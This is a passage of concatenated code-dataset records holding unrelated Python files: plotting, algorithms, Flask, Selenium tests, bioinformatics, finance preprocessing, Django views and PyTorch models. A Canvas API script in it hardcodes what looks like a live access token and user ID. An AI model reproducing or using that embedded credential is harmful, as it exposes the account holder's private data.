here.\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638265543","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\n\n\nalphaI=7.2\nalphaN=11.08\nF=0.6\nm=0\nIo=0.58\nB=0.51/2\n\ndef potential(F,n,A,B):\n \n t1= (1-(1+m)*np.sqrt(I(F))/2.0)/(2*n)\n \n t2= n*F/8\n \n t3= (m**2-1)/(8*n**2)\n \n t4= A * np.exp(-3*B/n) * (alphaI*F/n**2) +I(F)/4.0\n \n \n return -t1 - t2 + t3 + t4\n\n\n\n\ndef I(F):\n \n return Io + ((alphaN-alphaI)*F**2)/(2)\n\n\nF=[0,0.2,0.4,0.6,0.8]\n\nn=np.linspace(0.01,10,1000)\nV0=potential(F[0],n,1,1)\nV1=potential(F[1],n,1,1)\nV2=potential(F[2],n,1,1)\nV3=potential(F[3],n,1,1)\nV4=potential(F[4],n,1,1)\n\n\nplt.plot(n,V0,label=\"$ F=$\"+str(F[0]) )\nplt.plot(n,V1,label=\"$ F=$\"+str(F[1]) )\nplt.plot(n,V2,label=\"$ F=$\"+str(F[2]))\nplt.plot(n,V3,label=\"$ F=$\"+str(F[3]))\nplt.plot(n,V4,label=\"$ F=$\"+str(F[4]))\nplt.ylim(-1.5,1.5)\n\nplt.title(\"$ Potentials 
$\",size=20)\nplt.xlabel(\"$ \\eta\\ (a.u.) $\",size=15)\nplt.ylabel(\"$ V(\\eta,F)+I_P(F)/4 $\",size=15)\n\n\nplt.legend(loc=1)\nplt.savefig(\"pot_parab_F_uncorrected.png\")\nplt.plot()\nplt.show()\n","sub_path":"Times/Potential_eta/uncorrected_F.py","file_name":"uncorrected_F.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310325917","text":"# Iteratively method\n# Given [1,2,3]\n# when num points to 1\n# ans will be [] + [1]\n# result in [[], [1]]\n# when num points to 2\n# ans will be [[]+[2], [1]+ [2]\n# result in [[], [1], [2], [1,2]]\n# and finally\n# [[], [1], [2], [3], [1,2], [1,2,3]]\n\n\ndef subsets_iter(nums):\n ans = [[]]\n for num in nums:\n ans += [item + [num] for item in ans]\n return ans\n\n'''\nVisualization\ndfs(nums = [1,2,3], index = 0, path = [], res = [])\n dfs(nums = [1,2,3], index = 1, path = [1], res = [[]])\n dfs(nums = [1,2,3], index = 2, path = [1,2], res = [[], [1]])\n def(nums = [1,2,3], index = 3, path = [1,2,3], res = [[], [1], [1,2]])\n next: res = [[], [1], [1,2], [1,2,3]]\n loop will not execute\n dfs(nums = [1,2,3], index = 2, path [[2]], res = [[], [1],[1,2], [1,2,3]])\n dfs(nums = [1,2,3], index = 3, path = [[2,3]], res = [[], [1], [1,2], [1,2,3], [2])\n next iteration res = [[], [1], [1,2], [1,2,3], [2], [2,3])\n for loop will not be executed\n dfs(nums = [1,2,3], index = 3, path [[3]], res = [[], [1], [1,2], [1,2,3], [2], [2,3]])\n next iteration res = [[], [1],[1,2],[1,2,3],[2],[2,3],[3])\n for loop will not be executed\n'''\n\ndef subsets_dfs(nums):\n ans = []\n # base case\n dfs(nums, 0, [], ans)\n return ans\ndef dfs(nums, index, path, ans):\n ans.append(path)\n for i in range(index, len(nums)):\n print(\"This is current i\")\n print(i)\n print(\"This is current index\")\n print(index)\n print(\"This is current path\")\n print(path)\n print(\"This is current answer\")\n print(ans)\n dfs(nums, i+1, path + [nums[i]], ans)\n\nnums = [1,2,3]\nprint(subsets_dfs(nums))\n","sub_path":"dynamic/subsets_78.py","file_name":"subsets_78.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449241429","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n@app.route(\"/advice\")\ndef advice():\n import random\n quotes = [];\n quotes.append(\"We all wear masks, and the time comes when we cannot remove them without removing some of our own skin.\")\n quotes.append(\"We understand how dangerous a mask can be. We all become what we pretend to be.\")\n quotes.append(\"Nothing is more real than the masks we make to show each other who we are.\")\n quotes.append(\"An honest enemy is better than a friend who lies.\")\n quotes.append(\"Who knows what's behind that smile?\")\n quotes.append(\"Why so serious?\")\n s = quotes[random.randrange(0,len(quotes))]\n\n return render_template(\"advice.html\", quote = s)\n\n@app.route(\"/ask\")\n@app.route(\"/ask/\")\n@app.route(\"/ask/\")\ndef ask(word=\"\"):\n d = {};\n d['knife'] = \"A useful toy. It can bring suffering... or relief. Have you ever tried juggling several of them at once?\"\n d['friend'] = \"I have no friends, only acquantances. 
As soon as you feel like you can call someone a friend, that's when they can stab you in the back.\"\n d['box'] = \"A present? How sweet. I love surprises. But it seems like few others I've met do... I wonder why...\"\n return render_template(\"ask.html\", d = d, word=word)\nif __name__==\"__main__\":\n app.debug = True\n app.run(host='127.0.0.1',port=8001)\n","sub_path":"6/02-flask-intro/wu_raymond/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9595106","text":"import unittest\nimport HTMLTestRunner\n\nfrom selenium import webdriver\nfrom pyvirtualdisplay import Display\n\nclass MozillaTesting(unittest.TestCase):\n\n display = Display(visible=0, size=(1366, 768))\n display.start()\n\n def setUp(page):\n page.driver = webdriver.Firefox()\n\n def test_openMozilla(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n page.assertIn(\"Consoft\", driver.title)\n\n def test_insertTicketMozilla(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n inputElement = page.driver.find_element_by_link_text(\"Crea il tuo Ticket\")\n inputElement.click()\n\n def tearDown(page):\n page.driver.close()\n\t\t\nclass ChromeTesting(unittest.TestCase):\n\n def setUp(page):\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('window-size=1366x768')\n options.add_argument('no-sandbox')\n page.driver = webdriver.Chrome(chrome_options=options)\n\n def test_openChrome(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n page.assertIn(\"Consoft\", driver.title)\n\n def test_insertTicketChrome(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n inputElement = page.driver.find_element_by_link_text(\"Crea il tuo Ticket\")\n inputElement.click()\n\n def tearDown(page):\n page.driver.close()\n\nsuite = unittest.TestSuite()\nsuite.addTests([\n\tunittest.defaultTestLoader.loadTestsFromTestCase(MozillaTesting),\n\tunittest.defaultTestLoader.loadTestsFromTestCase(ChromeTesting)\n\t])\n\nrunner = HTMLTestRunner.HTMLTestRunner(\n title='Functional Tests',\n description='Report'\n )\n\n\nrunner.run(suite)\n","sub_path":"selenium/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174370806","text":"#/usr/bin/python\n\"\"\"\ncoding sequeces to be assesed with transcript in\ncomposite bed\n\"\"\"\n\nimport os\nimport argparse\nimport csv\nimport subprocess\nimport logging\nimport time\nimport datetime\nfrom collections import defaultdict\nimport create_composite_bed\n\nTMP_OUT_DIR=os.getcwd()\nlogger_file = \"bed_validation\"\n\n\ndef main():\n args = parse_args()\n run(args.bed_file, args.composite_bed,args.transcript_mapping)\n\n\ndef run(bed_file, composite_bed, transcript_mapping):\n logger = configure_logger(logger_file)\n index_dict = index_composite_bed(composite_bed)\n transcript_cds_dict = create_dict(transcript_mapping)\n compare_coding = asses_region(bed_file, index_dict, transcript_cds_dict, logger)\n \n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-b', dest='bed_file', type=argparse.FileType('r'),\n help=\"path to gene bed file\", required=True)\n parser.add_argument('-c', dest='composite_bed', type=argparse.FileType('r'),\n 
help=\"path to composite bed file\", required=True)\n parser.add_argument('-t', dest='transcript_mapping', type=argparse.FileType('r'),\n help='transcript cds tsv file', required=True)\n args = parser.parse_args()\n return args\n\n\ndef configure_logger(filename):\n \"\"\"\n setting up logging\n \"\"\"\n logger = logging.getLogger(filename)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(time.strftime(filename + \"-%Y%m%d.log\"))\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s'\\t'%(name)s'\\t'%(levelname)s'\\t'%(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger\n\n\n\nclass bed_file():\n\n def __init__(self, line):\n value = line.split('\\t')\n self.chrom = value[0].strip()\n self.start = int(value[1])\n self.stop = int(value[2])\n self.gene = value[3].strip()\n self.transcript = value[4].strip()\n self.exon = value[5].strip()\n self.strand = value[6].strip()\n\n def __iter__(self):\n return self\n\n def chromosome(self):\n return self.chrom\n\n def bed_start(self):\n return self.start\n \n def bed_stop(self):\n return self.stop\n\n def bed_gene(self):\n return self.gene\n\n def bed_transcript(self):\n return self.transcript\n\n\n def bed_exon(self):\n if not self.exon.startswith('Ex'):\n return 'Ex' + self.exon\n else:\n return self.exon\n\n def bed_strand(self):\n return self.strand\n\n\ndef index_composite_bed(composite_bed):\n index_composite_dict = {}\n headers = ['chrom', 'start', 'stop', 'gene', 'transcript', 'exon', 'strand']\n reader = csv.DictReader(composite_bed, delimiter='\\t', fieldnames=headers)\n for row in reader:\n trascript = row['transcript']\n exon = row['exon']\n strand = row['strand']\n key = trascript + ':' + exon\n value = [row['start'], row['stop']]\n index_composite_dict[key] = value\n return index_composite_dict\n\n\ndef remove_trash(somefile):\n if os.path.isfile(somefile):\n os.remove(somefile)\n else:\n pass\n\n\ndef create_dict(mapping_file):\n mapping_dict = {}\n for raw_line in mapping_file:\n value = raw_line.strip().split('\\t')\n mapping_dict[value[0]] = [value[1], value[2]]\n return mapping_dict\n\n\ndef asses_region(gene_bed, index_composite_dict, transcript_cds_dict, logger):\n for raw_line in gene_bed:\n value = raw_line.strip()\n parse_bed = bed_file(value)\n chrom = parse_bed.chromosome()\n transcript = parse_bed.bed_transcript()\n start = parse_bed.bed_start()\n stop = parse_bed.bed_stop()\n exon = parse_bed.bed_exon()\n gene = parse_bed.bed_gene()\n strand = parse_bed.bed_strand()\n gene_key = transcript + ':' + exon \n if index_composite_dict[gene_key]:\n check_position = compare_region(start, stop, index_composite_dict[gene_key][0], \n index_composite_dict[gene_key][1], gene, transcript, exon, strand, transcript_cds_dict, logger)\n \n \n\ndef compare_region(gene_cds_start, gene_cds_stop, trans_cds_start, trans_cds_stop, gene, transcript, exon, strand, transcript_cds_dict, logger):\n if strand == '+':\n if int(gene_cds_start) <= int(trans_cds_start) <= int(gene_cds_stop):\n pass\n else:\n if transcript.startswith('NM_'):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_start) <= cds_stop:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n \n else:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript 
{4}\".format(gene_cds_start, gene, \n exon,\n trans_cds_start, \n transcript))\n if int(gene_cds_stop) >= int(trans_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_stop) <= cds_stop:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n if int(gene_cds_start) <= int(trans_cds_start) <= int(gene_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_start) <= cds_stop:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n else:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n if int(gene_cds_stop) >= int(trans_cds_stop):\n pass\n else:\n if transcript.startswith(\"NM_\"):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_stop) <= cds_stop:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n else:\n logger.debug(\"stop {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_stop, gene,\n exon,\n trans_cds_stop,\n transcript))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/asses_coding_sequences.py","file_name":"asses_coding_sequences.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73829428","text":"from functools import reduce\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef as_quarter(months):\n \"\"\"\n 월(month) 값을 분기(quarter) 값으로 전환\n Example: (1, 2, 3, 4, 5, 6) -> (1, 1, 1, 2, 2, 2)\n\n INPUT:\n x: 1 ~ 12 사이의 integer vector\n RETURN:\n 월 -> 분기로 전환된 integer vector\n \"\"\"\n months = pd.to_numeric(months)\n if not np.all(np.isin(months, np.arange(1, 13))):\n raise ValueError(\"range of months exceeds 1~12\")\n return (np.array(months) - 1) // 3 + 1\n\n\ndef is_quarter_interval(date_str):\n \"\"\"\n 시간 변수가 날짜 형식(ex: \"20010131\")인지\n 혹은 분기 형식(ex: \"2001/1 Quarter)인지 검사\n\n INPUT:\n x: date string vector\n RETURN:\n 날짜 형식이면 FALSE, 분기 형식이면 TRUE\n \"\"\"\n return len(str(date_str)) == 5\n\n\ndef reshape_long(df):\n \"\"\"\n Short form 데이터를 long form 데이터로 변환\n 시간 변수가 날짜 형식인 경우 분기 형식으로 변환\n\n INPUT:\n data: raw data를 불러들인 data frame\n RETURN:\n long form으로 전환된 data frame\n \"\"\"\n df = gather(df)\n df.val = pd.to_numeric(df.val)\n df = tidyup_timeframe(df, is_quarter_interval(df.time[0]))\n return df\n\n\ndef gather(df):\n df.rename(index=str, columns={\"Unnamed: 1\": \"code\", \"Unnamed: 2\": \"name\"}, inplace=True)\n df.columns = [\"y\"+format_quarter(str(c)) if c[0].isnumeric() else c for c in df.columns]\n df = pd.wide_to_long(df, stubnames=\"y\", i=[\"code\", \"name\"], j=\"time\")\n df = 
pd.DataFrame(df.to_records()).rename(index=str, columns={\"y\": \"val\"})\n return df\n\n\ndef format_quarter(string):\n return string.replace(\" \", \"\").replace(\"/\", \"\").replace(\"Quarter\", \"\").replace(\"SemiAnnual\", \"2\").replace(\"Annual\", \"4\")\n\n\ndef tidyup_timeframe(df, is_quarter):\n df.val = pd.to_numeric(df.val)\n if is_quarter:\n year_quarter = df.time.astype(str).str.extract('(.{4,4})(.{1,1})')\n year_quarter.columns = [\"year\", \"quarter\"]\n yq = year_quarter.year + \"-\" + year_quarter.quarter\n yq.name = \"time\"\n df = pd.concat([df.iloc[:, :2], yq, df.val], axis=1)\n else:\n year_quarter = df.time.astype(str).str.extract('(.{4,4})(.{2,2})')\n year_quarter.columns = [\"year\", \"quarter\"]\n yq = year_quarter.year + \"-\" + as_quarter(year_quarter.quarter).astype(str)\n yq.name = \"time\"\n df = pd.concat([df.iloc[:, :2], yq, df.val], axis=1)\n df = pd.DataFrame(df.groupby([\"code\", \"name\", \"time\"]).mean().to_records())\n df.sort_values(by=[\"code\", \"time\"], inplace=True)\n return df\n\n\ndef preprocess(path, file_names, var_names, extension=\".xls\"):\n dfs = []\n for name in file_names:\n print(name, end=\", \")\n file_path = os.path.join(path, name+extension)\n data = reshape_long( pd.read_excel(file_path, skiprows=5).iloc[1:, 1:] )\n dfs.append(data)\n\n vals = reduce(lambda x, y: x.merge(y, how=\"left\", on=[\"code\", \"name\", \"time\"]), dfs).iloc[:, 3:]\n vals.columns = var_names\n\n features = extract_features(vals)\n df = pd.concat([data.loc[:, [\"code\", \"time\"]], features], axis=1)\n return df\n\n\ndef extract_features(vals):\n leverage = vals.leverage\n asset_growth = vals.asset_growth\n shares_turnover = vals.trade_amount / vals.stock_num\n roa = vals.net_profit / vals.asset\n roe = vals.net_profit / vals.equity\n size = vals.market_cap\n pcr = vals.pcr\n per = vals.per\n equity_turnover = vals.equity_turnover\n volatility = vals.volatility\n logret = np.log(vals.price).diff()\n\n features = pd.concat([leverage, asset_growth, shares_turnover, roa, roe, size,\n pcr, per, equity_turnover, volatility, logret], axis=1)\n features.columns = [\"leverage\", \"asset_growth\", \"shares_turnover\", \"roa\", \"roe\", \"size\",\n \"pcr\", \"per\", \"equity_turnover\", \"volatility\", \"logret\"]\n return features\n","sub_path":"src/preprocessing_utils.py","file_name":"preprocessing_utils.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109986315","text":"import json\nimport requests\nimport numpy as np\nimport pandas as pd\n\nuser_id = '45110000000126834'\nacc_token = '4511~V35YjSpgz6zU1lSniHKUYjFvHNaE7h3koE8g9t6XUsXVTGv2ZGNoxn3FoRPxZTYC'\n\ndef pull_classes():\n\t#Gets a list of all classes\n\t#response = requests.get('https://canvas.instructure.com/api/v1/courses', params=access_token)\n\tclass_list = requests.get(f'https://canvas.instructure.com/api/v1/courses?access_token={acc_token}').json()\n\t\n\twith open('classes.json', 'w+') as f:\n\t\tjson.dump(class_list, f)\n\ndef get_classes():\n\twith open('classes.json', 'r') as f:\n\t\tclasses_all = json.load(f)\n\n\tclasses = {}\n\n\tfor distro in classes_all:\n\t\tprint(distro['name'])\n\t\tprint(distro['id'])\n\n\t\t#Adds classes to list based on user input\n\t\tch = input('Would you like to keep this class? 
(Y/N): ')\n\n\t\tif ch == 'Y' or ch == 'y':\n\t\t\tclasses.update({distro['name']: distro['id']})\n\treturn classes\n\ndef pull_assignments(class_id):\n\tassigns = requests.get(f'https://canvas.instructure.com/api/v1/users/{user_id}/courses/{class_id}/assignments?access_token={acc_token}').json()\n\tassignments = []\n\tfor a in assigns:\n\t\tassign_name = a['name']\n\t\tdue_date = a['due_at']\n\t\tassign_id = a['id']\n\t\tassign_pts_pos = a['points_possible']\n\t\tassignment_details = [assign_name, due_date, assign_pts_pos, assign_id]\n\t\tassignments.append(assignment_details)\n\treturn pd.DataFrame(np.array(assignments), columns=['Name', 'Due Date', 'Points Possible', 'ID'])\n\n\n \ndef csv_export(name, df):\n\tdf.to_excel(f'Assignments/{name}_assignments.xlsx')\n\tdf.to_csv(f'Assignments/{name}_assignments.csv')\n\n\n#pull_classes()\nclasses = get_classes()\nfor c in classes:\n\tdf = pull_assignments(classes[c])\n\tcsv_export(c, df)\n\n","sub_path":"json_read.py","file_name":"json_read.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"205426769","text":"\"\"\"Views for programming application.\"\"\"\n\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.http import JsonResponse, Http404\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist, PermissionDenied\nimport json\nfrom programming.models import (\n Question,\n TestCase,\n Attempt,\n TestCaseAttempt,\n)\nfrom research.models import StudyRegistration\n\nQUESTION_JAVASCRIPT = 'js/question_types/{}.js'\n\n\nclass IndexView(generic.base.TemplateView):\n \"\"\"Homepage for programming.\"\"\"\n\n template_name = 'programming/index.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Get additional context data for template.\"\"\"\n context = super().get_context_data(**kwargs)\n context['questions'] = Question.objects.select_subclasses()\n return context\n\n\nclass QuestionListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View for listing questions.\"\"\"\n\n model = Question\n context_object_name = 'questions'\n\n def get_queryset(self):\n \"\"\"Return questions objects for page.\n\n Returns:\n Question queryset.\n \"\"\"\n now = timezone.now()\n if self.request.user.is_authenticated:\n # Look for active study registration\n try:\n study_registration = StudyRegistration.objects.get(\n user=self.request.user,\n study_group__study__start_date__lte=now,\n study_group__study__end_date__gte=now,\n )\n except ObjectDoesNotExist:\n study_registration = None\n\n if study_registration:\n questions = study_registration.study_group.questions.select_subclasses()\n else:\n questions = Question.objects.all().select_subclasses()\n\n if self.request.user.is_authenticated:\n # TODO: Check if passed in last 90 days\n for question in questions:\n question.completed = Attempt.objects.filter(\n profile=self.request.user.profile,\n question=question,\n passed_tests=True,\n ).exists()\n return questions\n\n\nclass QuestionView(LoginRequiredMixin, generic.DetailView):\n \"\"\"Displays a question.\n\n This view requires to retrieve the object first in the context,\n in order to determine the required template to render.\n \"\"\"\n\n template_name = 'programming/question.html'\n\n def get_object(self, **kwargs):\n \"\"\"Get question object for view.\"\"\"\n try:\n question = Question.objects.get_subclass(\n pk=self.kwargs['pk']\n )\n except Question.DoesNotExist:\n 
raise Http404(\"No question matches the given ID.\")\n\n if self.request.user.is_authenticated:\n # Look for active study registration\n now = timezone.now()\n try:\n study_registration = StudyRegistration.objects.get(\n user=self.request.user,\n study_group__study__start_date__lte=now,\n study_group__study__end_date__gte=now,\n )\n except StudyRegistration.DoesNotExist:\n study_registration = None\n if study_registration and question not in study_registration.study_group.questions.select_subclasses():\n raise PermissionDenied\n return question\n\n def get_context_data(self, **kwargs):\n \"\"\"Get additional context data for template.\"\"\"\n context = super().get_context_data(**kwargs)\n context['question'] = self.object\n test_cases = self.object.test_cases.values()\n context['test_cases'] = test_cases\n context['test_cases_json'] = json.dumps(list(test_cases))\n context['question_js'] = QUESTION_JAVASCRIPT.format(self.object.QUESTION_TYPE)\n\n if self.request.user.is_authenticated:\n try:\n previous_attempt = Attempt.objects.filter(\n profile=self.request.user.profile,\n question=self.object,\n ).latest('datetime')\n except ObjectDoesNotExist:\n previous_attempt = None\n context['previous_attempt'] = previous_attempt\n return context\n\n\ndef save_question_attempt(request):\n \"\"\"Save user's attempt for a question.\n\n If the attempt is successful: add points if these haven't already\n been added.\n\n Args:\n request (Request): AJAX request from user.\n\n Returns:\n JSON response with result.\n \"\"\"\n result = {\n 'success': False,\n }\n if request.is_ajax():\n if request.user.is_authenticated:\n request_json = json.loads(request.body.decode('utf-8'))\n profile = request.user.profile\n question = Question.objects.get(pk=request_json['question'])\n user_code = request_json['user_input']\n\n # If same as previous attempt, don't save to database\n previous_attempt = Attempt.objects.filter(\n profile=profile,\n question=question,\n ).order_by('-datetime').first()\n if not previous_attempt or user_code != previous_attempt.user_code:\n test_cases = request_json['test_cases']\n total_tests = len(test_cases)\n total_passed = 0\n for test_case in test_cases.values():\n if test_case['passed']:\n total_passed += 1\n\n attempt = Attempt.objects.create(\n profile=profile,\n question=question,\n user_code=user_code,\n passed_tests=total_passed == total_tests,\n )\n\n # Create test case attempt objects\n for test_case_id, test_case_data in test_cases.items():\n test_case = TestCase.objects.get(pk=test_case_id)\n TestCaseAttempt.objects.create(\n attempt=attempt,\n test_case=test_case,\n passed=test_case_data['passed'],\n )\n result['success'] = True\n else:\n result['success'] = False\n result['message'] = 'Attempt not saved, same as previous attempt.'\n\n return JsonResponse(result)\n","sub_path":"codewof/programming/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102230722","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__=\"model\"\n__author__=\"ngc7293\"\n__mtime__=\"2020/9/20\"\n\"\"\"\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\n\nclass TextCnn(nn.Module):\n def __init__(self,\n vocab_size,\n embedding_dim,\n class_num,\n embedding_pretrained=None,\n kernel_size = [3, 4, 5],\n hidden_size = 100,\n dropout=0.5,\n sentence_len = 50):\n super(TextCnn, self).__init__()\n if embedding_pretrained is None:\n self.embed_layer = 
nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=sentence_len)\n else:\n self.embed_layer = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim,\n _weight=embedding_pretrained, padding_idx=sentence_len)\n\n self.conv_layer = nn.ModuleList([nn.Conv2d(1, hidden_size, (k, embedding_dim)) for k in kernel_size])\n\n self.dropout_layer = nn.Dropout(dropout)\n\n self.linear_layer = nn.Linear(3*hidden_size, class_num)\n\n def forward(self,x):\n \"\"\"\n :param x: batch_size , sentence_len\n :return:\n \"\"\"\n embed_out = self.embed_layer(x).unsqueeze(1)\n conv_out = [F.relu(conv(embed_out)).squeeze(3) for conv in self.conv_layer]\n pool_out = torch.cat([F.max_pool1d(out, out.size(2)).squeeze(2) for out in conv_out],1)\n\n out = self.linear_layer(pool_out)\n return out\n\nclass TextRnn(nn.Module):\n def __init__(self,\n vocab_size,\n embedding_dim,\n class_num,\n hidden_size,\n embedding_pretrained=None,\n dropout = 0.5,\n max_len = 50,\n device = torch.device('cpu')):\n super(TextRnn, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.class_num = class_num\n self.hidden_size = hidden_size\n self.device = device\n\n if embedding_pretrained is None:\n self.embedding_layer = nn.Embedding(vocab_size, embedding_dim, padding_idx=max_len)\n else:\n self.embedding_layer = nn.Embedding(vocab_size, embedding_dim, padding_idx=max_len, _weight=embedding_pretrained)\n\n self.rnn_layer = nn.RNN(input_size=embedding_dim, hidden_size=hidden_size, batch_first=True)\n\n self.linear_layer = nn.Linear(hidden_size, class_num)\n\n def forward(self, x):\n batch_size, max_len = x.shape\n\n embedding_out = self.embedding_layer(x)\n\n h_0 = torch.randn(1,batch_size, self.hidden_size).to(self.device)\n _, h_n = self.rnn_layer(embedding_out,h_0)\n\n out = self.linear_layer(h_n).squeeze(0)\n return out\n\n\n","sub_path":"task2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380949331","text":"import pandas as pd\nimport numpy as np\n# LETS GET OUR VIX DATA\nvix = pd.read_csv(r\"Pdata/vix.csv\", index_col = 0)\nvix = pd.DataFrame(vix['Close'])\nvix = pd.DataFrame(vix.loc['2010-01-01': '2017-01-01'])\nvix = vix.rename(columns = {'Close': 'vix'})\n\n\n#LETS GET THE EXOGENOUS VARIABLES \n#SENSEX index data\nbsesn = pd.read_csv(r\"Pdata/BSESN.csv\", index_col = 0)\nbsesn_dr = pd.DataFrame(bsesn['return'])\nbsesn_idr = pd.DataFrame(bsesn['idr_ret'])\nbsesn_dr = pd.DataFrame(bsesn_dr.loc['2010-01-01': '2017-01-01'])\nbsesn_idr = pd.DataFrame(bsesn_idr.loc['2010-01-01': '2017-01-01'])\nbsesn_dr = bsesn_dr.rename(columns = {'return': 'bsesn_dr'})\nbsesn_idr = bsesn_idr.rename(columns = {'idr_ret': 'bsesn_idr'})\n\n#MOVE index\nmove = pd.read_csv(r\"Pdata/MOVE.csv\", index_col = 0)\nmove = pd.DataFrame(move.loc['2010-01-01': '2017-01-01'])\nmove = move.rename(columns = {'Close': 'MOVE'})\nmove_l1 = move.shift(1)\nmove_l1 = move_l1.rename(columns = {'MOVE': 'MOVE_l1'})\n\n#S&P500 - split this into positive and negative, and take the 5 and 22 day MA as well like the L-HAR\nsnp = pd.read_csv(r\"Pdata/snp.csv\", index_col = 0)\nsnp = pd.DataFrame(snp.loc['2010-01-01': '2017-01-01'])\n\n#USD index \nusd = pd.read_csv(r\"Pdata/USD_index.csv\", index_col = 0)\nusd = pd.DataFrame(usd.loc['2010-01-01': '2017-01-01'])\nusd = pd.DataFrame(usd['return'])\nusd = usd.rename(columns = {'return': 'USD_lret'})\nusd_l1 = 
usd.shift(1)\nusd_l1 = usd_l1.rename(columns = {'USD_lret': 'USD_lret_l1'})\n\n#WTI\nwti = pd.read_csv(r\"Pdata/WTIc1.csv\", index_col = 0)\nwti = pd.DataFrame(wti.loc['2010-01-01': '2017-01-01'])\nwti = pd.DataFrame(wti['return'])\nwti = wti.rename(columns = {'return': 'WTI_lret'})\nwti_l1 = wti.shift(1)\nwti_l1 = wti_l1.rename(columns = {'WTI_lret': 'WTI_lret_l1'})\n\n#VVIX\nvvix = pd.read_csv(r\"Pdata/vvix.csv\", index_col = 0)\nvvix = pd.DataFrame(vvix.loc['2010-01-01': '2017-01-01'])\nvvix = pd.DataFrame(vvix['Close'])\nvvix = vvix.rename(columns = {'Close': 'vvix'})\nvvix_l1 = vvix.shift(1)\nvvix_l1 = vvix_l1.rename(columns = {'vvix': 'vvix_l1'})\n\n#SKEW\nskew = pd.read_csv(r\"Pdata/skew.csv\", index_col = 0)\nskew = pd.DataFrame(skew.loc['2010-01-01': '2017-01-01'])\nskew_l1 = skew.shift(1)\nskew_l1 = skew_l1.rename(columns = {'skew': 'skew_l1'})\nskew_change = pd.DataFrame(skew - skew.shift(1)).rename(columns = {'skew': 'Skew_diff'})\n\n#concat all the frames and make all fit the 